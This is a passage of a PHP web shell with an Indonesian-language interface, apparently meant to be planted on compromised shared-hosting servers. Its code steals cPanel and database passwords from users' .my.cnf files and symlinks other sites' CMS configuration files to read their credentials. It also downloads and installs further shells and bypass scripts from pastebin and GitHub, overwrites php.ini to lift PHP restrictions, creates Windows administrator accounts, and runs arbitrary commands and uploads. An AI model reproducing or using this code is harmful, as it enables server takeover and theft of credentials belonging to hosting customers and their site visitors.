1308. <a href="?<?php echo "path=".$path; ?>&amp;x=brute"><input class=bordergaya type=submit value="Cpanel Bruteforce" /></a>
1309. Or <a href="?<?php echo "path=".$path; ?>&amp;x=cpcrack"><input class=bordergaya type=submit value="Auto Cpanel Finder/Cracker" /></a>
1310. <br/><br/><br/><br/>
1311. <?php die(); ?>
1312.  
1313. <?php
1314. }
1315. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack'))
1316. {
1317. ?>
1318. <form action="?path=<?php echo $path; ?>&amp;x=cpcrack" method="post">
1319. <?php
1320.  
1321. @ini_set('display_errors',0);
1322. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1323. $ar0=explode($marqueurDebutLien, $text);
1324. $ar1=explode($marqueurFinLien, $ar0[$i]);
1325. return trim($ar1[0]);
1326. }
1327.  
1328. echo '<h1>Cpanel Finder/Cracker</h1><br/>';
1329.  
1330. echo "<center>";
1331. $d0mains = @file('/etc/named.conf');
1332. $domains = scandir("/var/named");
1333.  
1334. if ($domains or $d0mains)
1335. {
1336. $domains = scandir("/var/named");
1337. if($domains) {
1338. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1339. $count=1;
1340. $dc = 0;
1341. $list = scandir("/var/named");
1342. foreach($list as $domain){
1343. if(strpos($domain,".db")){
1344. $domain = str_replace('.db','',$domain);
1345. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1346. $dirz = '/home/'.$owner['name'].'/.my.cnf';
1347. $path = getcwd();
1348.  
1349. if (is_readable($dirz)) {
1350. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
1351. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
1352. $password=entre2v2($p,'password="','"');
1353. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
1354. $dc++;
1355. }
1356.  
1357. }
1358. }
1359. echo '</table>';
1360. $total = $dc;
1361. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
1362. echo '</center>';
1363. }else{
1364. $d0mains = @file('/etc/named.conf');
1365. if($d0mains) {
1366. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
1367. $count=1;
1368. $dc = 0;
1369. $mck = array();
1370. foreach($d0mains as $d0main){
1371. if(@eregi('zone',$d0main)){
1372. preg_match_all('#zone "(.*)"#',$d0main,$domain);
1373. flush();
1374. if(strlen(trim($domain[1][0])) >2){
1375. $mck[] = $domain[1][0];
1376. }
1377. }
1378. }
1379. $mck = array_unique($mck);
1380. $usr = array();
1381. $dmn = array();
1382. foreach($mck as $o) {
1383. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
1384. $usr[] = $infos['name'];
1385. $dmn[] = $o;
1386. }
1387. array_multisort($usr,$dmn);
1388. $dt = file('/etc/passwd');
1389. $passwd = array();
1390. foreach($dt as $d) {
1391. $r = explode(':',$d);
1392. if(strpos($r[5],'home')) {
1393. $passwd[$r[0]] = $r[5];
1394. }
1395. }
1396. $l=0;
1397. $j=1;
1398. foreach($usr as $r) {
1399. $dirz = '/home/'.$r.'/.my.cnf';
1400. $path = getcwd();
1401. if (is_readable($dirz)) {
1402. copy($dirz, ''.$path.'/'.$r.'.txt');
1403. $p=file_get_contents(''.$path.'/'.$r.'.txt');
1404. $password=entre2v2($p,'password="','"');
1405. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
1406. $dc++;
1407. flush();
1408. $l=$l?0:1;
1409. $j++;
1410. }
1411. }
1412. }
1413. echo '</table>';
1414. $total = $dc;
1415. echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />';
1416. echo '</center>';
1417.  
1418. }
1419. }else{
1420. echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>";
1421. }
1422.  
1423. echo "</body></html>";
1424. die();
1425. }
1426.  
1427. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1428. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////END OF CPANEL TOOLS//////////////////////////////
1429. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
1430.  
1431.  
1432. elseif(isset($_GET['x']) && ($_GET['x'] == 'vn'))
1433. {
1434. ?>
1435. <form action="?path=<?php echo $path; ?>&amp;x=vn" method="post">
1436. <center><h2>Domain Viewer</h2></center><br><br>
1437. <?php
1438. function openBaseDir()
1439. {
1440. $openBaseDir = ini_get("open_basedir");
1441. if (!$openBaseDir)
1442. {
1443. $openBaseDir = '<font color="green">OFF</font>';
1444. }
1445. else
1446. {
1447. $openBaseDir = '<font color="red">ON</font>';
1448. }
1449. return $openBaseDir;
1450. }
1451.  
1452.  
1453. echo '
1454. <table width="95%" cellspacing="0" cellpadding="0" >
1455. <td height="100" align="left" >';
1456. $pg = basename(__FILE__);
1457. $safe_mode = @ini_get('safe_mode');
1458. $dir = @getcwd();
1459. ////////////////////////////////////////////////////
1460. #.htaccess
1461. @mkdir('pee',0777);
1462. @symlink("/","pee/root");
1463. $htaccss = "Options all
1464. DirectoryIndex Sux.html
1465. AddType text/plain .php
1466. AddHandler server-parsed .php
1467. AddType text/plain .html
1468. AddHandler txt .html
1469. Require None
1470. Satisfy Any";
1471.  
1472. file_put_contents("pee/.htaccess",$htaccss);
1473. $etc = file_get_contents("/etc/passwd");
1474. $etcz = explode("\n",$etc);
1475.  
1476.  
1477. ##Symlink to the ROOT :p
1478. foreach($etcz as $etz){
1479. $etcc = explode(":",$etz);
1480. error_reporting(0);
1481.  
1482. $current_dir = posix_getcwd();
1483. $dir = explode("/",$current_dir);
1484.  
1485. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1486. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1487. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1488. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
1489. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
1490. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
1491. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1492. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1493. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1494. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
1495. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
1496. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
1497. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
1498. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
1499. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
1500. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
1501. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
1502. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1503. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1504. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1505. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1506. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1507. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1508. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1509. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1510. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1511. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1512. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1513. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1514. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
1515. }
1516. #############################
1517. if(is_readable("/var/named")){
1518. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1519. echo'<tr><td><center><b>SITE</b></center></td><td>
1520. <center><b>USER</b></center></td>
1521. <td></center><b>SYMLINK</b></center></td>';
1522. $list = scandir("/var/named");
1523. foreach($list as $domain){
1524. if(strpos($domain,".db")){
1525. $i += 1;
1526. $domain = str_replace('.db','',$domain);
1527. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1528.  
1529. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1530. <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
1531. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1532. }
1533. }
1534. echo "<center>Total Domains Found: ".$i."</center><br />";
1535. }else{
1536. echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
1537.  
1538. die();
1539.  
1540. ##################################
1541. error_reporting(0);
1542. $etc = file_get_contents("/etc/passwd");
1543. $etcz = explode("\n",$etc);
1544. if(is_readable("/etc/passwd")){
1545.  
1546. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1547. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
1548.  
1549. $list = scandir("/var/named");
1550.  
1551. foreach($etcz as $etz){
1552. $etcc = explode(":",$etz);
1553.  
1554. foreach($list as $domain){
1555. if(strpos($domain,".db")){
1556. $domain = str_replace('.db','',$domain);
1557. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1558. if($owner['name'] == $etcc[0])
1559. {
1560. $i += 1;
1561. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
1562. <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1563. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1564. }}}}
1565. echo "<center>Total Domains Found: ".$i."</center><br />";}
1566.  
1567. die();
1568. ###############################
1569. if(is_readable("/etc/named.conf")){
1570. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1571. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
1572. $named = file_get_contents("/etc/named.conf");
1573. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1574. foreach($domains[1] as $domain){
1575. $domain = trim($domain);
1576. $i += 1;
1577. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1578. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1579. }
1580. echo "<center>Total Domains Found: ".$i."</center><br />";
1581.  
1582. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
1583.  
1584. die();
1585. ############################
1586. if(is_readable("/etc/valiases")){
1587. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
1588. echo'<tr><td><center><b>SITE</b></center></td><td>
1589. <center><b>USER</b></center></td><td></center>
1590. <b>SYMLINK</b></center></td>';
1591. $list = scandir("/etc/valiases");
1592. foreach($list as $domain){
1593. $i += 1;
1594. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1595. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1596. <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1597. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1598. }
1599. echo "<center>Total Domains Found: ".$i."</center><br />";
1600. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
1601.  
1602. die();
1603. }
1604.  
1605. ///DUMP
1606. elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
1607. {
1608. ?>
1609. <br/><br/>
1610. <form action="?path=<?php echo $path; ?>&amp;x=dump" method="post">
1611. <?php
1612. $pilih = $_POST['pilihan'];
1613. echo'<center>
1614. <table border=1>
1615. <select class="bordergaya" align="left" name="pilihan" id="pilih">
1616. <option value="dumper">Gate 1</option>
1617. </select>
1618. <input type="submit" name="submites" class="bordergaya" value="Click here for Dump Email">';?><?php
1619. if ( $pilih == "dumper") {
1620. $files = file_get_contents("http://pastebin.com/raw/HhiURUER");
1621. file_put_contents("dumper.php",$files);
1622. echo "<script>alert('Done! Access dumper.php for processing'); hideAll();</script>";
1623. echo "<a href=".'dumper.php'." target=_blank><br/><br/><b>dumper.php [Click here]</b></a></center>";
1624. die();
1625. }
1626. echo'</td></form></tr></table>';
1627. die();
1628. }
1629.  
1630. ///menu rdp
1631. if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
1632. /* By Shor7cut */
1633. /* Interface By Putra-Attacker*/
1634. {
1635. if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
1636. {
1637. ?><br/><br/>
1638. <div id="content-left">
1639. <form action="" method="post">
1640. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1641. <tr>
1642. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
1643. </tr>
1644. <tr>
1645. <td><font class='kecew'>Username</font></td>
1646. <td><font class='kecew'> : </font></td>
1647. <td><input type="text" class="bordergaya" name="username" required></td>
1648. </tr>
1649. <tr>
1650. <td><font class='kecew'>Password</font></td>
1651. <td><font class='kecew'> : </font></td>
1652. <td><input type="text" class="bordergaya" name="password" required></td>
1653. </tr>
1654. <tr>
1655. <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
1656. </tr>
1657. </table>
1658. </form>
1659. </div>
1660. <br/>
1661. <div id="content-left">
1662. <form action="" method="post">
1663. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
1664. <tr>
1665. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
1666. </tr>
1667. <tr>
1668. <td><font class='kecew'>Username</font></td>
1669. <td><font class='kecew'> : </font></td>
1670. <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
1671. </tr>
1672. <tr>
1673. <td><font class='kecew'>Password</font></td>
1674. <td><font class='kecew'> : </font></td>
1675. <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
1676. </tr>
1677. <tr>
1678. <td><font class='kecew'>Action</font></td>
1679. <td><font class='kecew'> : </font></td>
1680. <td>
1681. <select name="aksi" class="bordergaya">
1682. <option value="1">Tampilkan Username</option>
1683. <option value="2">Hapus Username</option>
1684. <option value="3">Ubah Password</option>
1685. </select>
1686. </td>
1687. </tr>
1688. <tr>
1689. <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
1690. </tr>
1691. </table>
1692. </form>
1693. <br/>
1694. </div>
1695. </center></center>
1696. <?php
1697. if($_POST['submit'])
1698. {
1699. if($_POST['kshell']=="1")
1700. {
1701. $r_user = $_POST['username'];
1702. $r_pass = $_POST['password'];
1703. $cmd_cek_user = shell_exec("net user");
1704. if(preg_match("/$r_user/", $cmd_cek_user)){
1705. echo $gaya_root.$r_user." sudah ada".$o;
1706. }else {
1707. $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
1708. $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
1709. $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
1710. $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
1711. if($cmd_add_user){
1712. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
1713. }else {
1714. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
1715. }
1716. echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar.. <br/>";
1717. if($cmd_add_groups1){
1718. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1719. }else
1720. if($cmd_add_groups2){
1721. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1722. }else
1723. if($cmd_add_groups3){
1724. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
1725. }else {
1726. echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
1727. }
1728. echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
1729. echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username : ".$r_user."</font><br/><font class='rapihbanget'>--- Password : </font>".$r_pass.$o."</font><br/><br/>";
1730. echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
1731. }
1732.  
1733.  
1734. }
1735. else if($_POST['kshell']=="2")
1736. {
1737. echo "<style>
1738. .coeg{margin-left:30%;}
1739. </style>";
1740. if($_POST['aksi']=="1"){
1741. echo "<pre class='coeg'>".shell_exec("net user");
1742. }
1743. else if($_POST['aksi']=="2")
1744. {
1745. $username = $_POST['rusername'];
1746. $cmd_cek_user = shell_exec("net user");
1747. if (!empty($username)){
1748. if(preg_match("/$username/", $cmd_cek_user)){
1749. $cmd_add_user = shell_exec("net user ".$username." /DELETE");
1750. if($cmd_add_user){
1751. echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu.. </font><br /><br />";
1752. echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1753. }else {
1754. echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
1755. }
1756. }else {
1757. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1758. }
1759. }else {
1760. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1761. }
1762. }
1763. else if($_POST['aksi']=="3")
1764. {
1765. echo "<style>
1766. .tengahaja{margin-left:35%}
1767. </style>";
1768. $username = $_POST['rusername'];
1769. $password = $_POST['gantipw'];
1770. $cmd_cek_user = shell_exec("net user");
1771. if (!empty($username)){
1772. if(preg_match("/$username/", $cmd_cek_user)){
1773. $cmd_add_user = shell_exec("net user ".$username."");
1774. if($cmd_add_user){
1775. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
1776. }else {
1777. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
1778. }
1779. }else
1780. {
1781. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
1782. }
1783. }else
1784. {
1785. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
1786. }
1787. }
1788. }
1789.  
1790. }
1791. } else{
1792. echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
1793. }die();
1794. }
1795.  
1796. /*
1797. AUTO UPLOAD
1798. START HERE
1799. */
1800.  
1801. elseif(isset($_GET['x']) && ($_GET['x'] == 'fcrot'))
1802. {
1803. echo'<center><br><br><h3>File Creator [Auto upload]</h3>
1804. <table>
1805. <tr><form method="post" action="">&nbsp;<td>
1806. <select class="bordergaya" align="left" name="pilihan" id="pilih">
1807. <option value="hsphere">Bypass hSphere Shell</option>
1808. <option value="adminer">Adminer</option>
1809. </select>
1810. <input type="submit" name="submites" class="bordergaya" value="create">
1811. </td></form></tr></table><br/><br/><br/>';
1812. error_reporting(0);
1813. set_time_limit(0);
1814. $submit = $_POST ['submites'];
1815. if(isset($submit)) {
1816. $pilih = $_POST['pilihan'];
1817. ///hsphere shell
1818. if ( $pilih == 'hsphere') {
1819. $files = file_get_contents("https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php");
1820. file_put_contents("hsphere.php",$files);
1821. echo "<script>alert('Bypass hsphere shell created!'); hideAll();</script>";
1822. echo "<a href="."hsphere.php"." target=_blank><b>hsphere.php [Click here]</b></a></center>";
1823. die();
1824. }
1825.  
1826. elseif ( $pilih == 'adminer') {
1827. getfile("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php");
1828. echo "<script>alert('adminer created!'); hideAll();</script>";
1829. echo "<a href="."adminer.php"." target=_blank><b>adminer.php [Click here]</b></a></center>";
1830. die();
1831. }
1832. }die();
1833. }
1834.  
1835.  
1836. elseif(isset($_GET['x']) && ($_GET['x'] == 'korong'))
1837. {
1838. echo '<center><br /><br />
1839. <form enctype="multipart/form-data" method="POST">
1840. <input type="file" name="file" id="file" class="inputfile inputfile-4" />
1841. <label for="file">
1842. <figure>
1843. <svg xmlns="http://www.w3.org/2000/svg" width="20" height="17" viewBox="0 0 20 17"><path d="M10 0l-5.2 4.9h3.3v5.1h3.8v-5.1h3.3l-5.2-4.9zm9.3 11.5l-3.2-2.1h-2l3.4 2.6h-3.5c-.1 0-.2.1-.2.1l-.8 2.3h-6l-.8-2.2c-.1-.1-.1-.2-.2-.2h-3.6l3.4-2.6h-2l-3.2 2.1c-.4.3-.7 1-.6 1.5l.6 3.1c.1.5.7.9 1.2.9h16.3c.6 0 1.1-.4 1.3-.9l.6-3.1c.1-.5-.2-1.2-.7-1.5z"/></svg>
1844. </figure>
1845. <span>Silahkan Pilih File</span>
1846. </label>';
1847. ?>
1848. <script type="text/javascript">
1849. /*
1850. By Osvaldas Valutis, www.osvaldas.info
1851. Available for use under the MIT License
1852. */
1853.  
1854. 'use strict';
1855.  
1856. ;( function ( document, window, index )
1857. {
1858. var inputs = document.querySelectorAll( '.inputfile' );
1859. Array.prototype.forEach.call( inputs, function( input )
1860. {
1861. var label = input.nextElementSibling,
1862. labelVal = label.innerHTML;
1863.  
1864. input.addEventListener( 'change', function( e )
1865. {
1866. var fileName = '';
1867. if( this.files && this.files.length > 1 )
1868. fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
1869. else
1870. fileName = e.target.value.split( '\\' ).pop();
1871.  
1872. if( fileName )
1873. label.querySelector( 'span' ).innerHTML = fileName;
1874. else
1875. label.innerHTML = labelVal;
1876. });
1877.  
1878. // Firefox bug fix
1879. input.addEventListener( 'focus', function(){ input.classList.add( 'has-focus' ); });
1880. input.addEventListener( 'blur', function(){ input.classList.remove( 'has-focus' ); });
1881. });
1882. }( document, window, 0 ));
1883. </script>
1884. <?php
1885. echo'<br/>
1886. <input type="submit" class="tombolupil" value="Upload File!" />
1887. </form>';
1888. if(isset($_FILES['file'])){
1889. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
1890. echo '<script>alert("File Sukses Di Upload!");</script>';
1891. }else{
1892. echo '<script>alert("File Gagal Di Upload!");</script>';
1893. }
1894. }
1895. echo "</center><br /><br />";
1896. die();
1897. }
1898.  
1899. ///////////////////////////
1900.  
1901. ////////////////////////CMD////////////////////////
1902.  
1903. elseif(isset($_GET['x']) && ($_GET['x'] == 'cmd')) {
1904. echo "<br/><br/><form method='post'>
1905. <font clss='rapihbanget'>Command :</font>
1906. <input class='bordergaya' type='text' size='30' height='10' name='cmd'><input type='submit' class='bordergaya' name='execmd' value=' Execute '>
1907. </form>";
1908. if($_POST['execmd']) {
1909. echo "<pre>".exe($_POST['cmd'])."</pre>";
1910. }
1911. }
1912.  
1913. ///////////////////////////////////////////////////
1914.  
1915. //////////////////////////////////////////////////
1916. //////////////////////////////////////////////////
1917. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypstuls'))
1918. {
1919. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>"; ?>
1920. <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
1921. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
1922. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
1923. <br/><br/><br/><br/>
1924. <?php
1925. }
1926. //////////////////////////////////////////////////
1927. //////////////////////////////////////////////////
1928.  
1929. ////////////////////////////////////////
1930. ///////////////////////////////////////
1931. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwsf')) {
1932. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With System Function</span><center>';
1933. mkdir('bysyswsf', 0755);
1934. chdir('bysyswsf');
1935. $bysyswsf = file_get_contents("http://pastebin.com/raw/nUTTPQnm");
1936. $file = fopen("bysyswsf.php" ,"w+");
1937. $write = fwrite ($file ,$bysyswsf);
1938. fclose($file);
1939. chmod("bysyswsf.php",0755);
1940. echo "<iframe src=bysyswsf/bysyswsf.php width=70% height=70% frameborder=0></iframe>";
1941. }
1942. ////////////////////////////////////////
1943. ////////////////////////////////////////
1944. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypsini')) {
1945. $byht = "safe_mode = Off
1946. disable_functions = None
1947. safe_mode_gid = OFF
1948. open_basedir = OFF
1949. allow_url_fopen = On";
1950. file_put_contents("php.ini",$byht);
1951. echo "<script>alert('Congrats! Sukses Bos Q ~_^'); hideAll();</script>";
1952. die('<meta http-equiv="refresh" content="0; url=?" />');
1953. }
1954. ////////////////////////////////////////
1955. ///////////////////////////////////////
1956. elseif(isset($_GET['x']) && ($_GET['x'] == 'bysysfuncwexec')) {
1957. echo '<br><center><span style="font-size:20px; font-family:Fredericka the Great; color:orange">Bypass Root Path With Exec Function</span><center>';
1958. mkdir('bysyswexecf', 0755);
1959. chdir('bysyswexecf');
1960. $bysyswsf = file_get_contents("http://pastebin.com/raw/KJiLdADd");
1961. $file = fopen("bysyswexecf.php" ,"w+");
1962. $write = fwrite ($file ,$bysyswsf);
1963. fclose($file);
1964. chmod("bysyswexecf.php",0755);
1965. echo "<iframe src=bysyswexecf/bysyswexecf.php width=70% height=70% frameborder=0></iframe>";
1966. }
1967. ////////////////////////////////////////
1968. ////////////////////////////////////////
1969.  
1970. ///////////////////////////////////////////////////////////////////////////
1971. ///////////JUMPING////////////////////////////////////////////////////////
1972. //////////////////////////////////////////
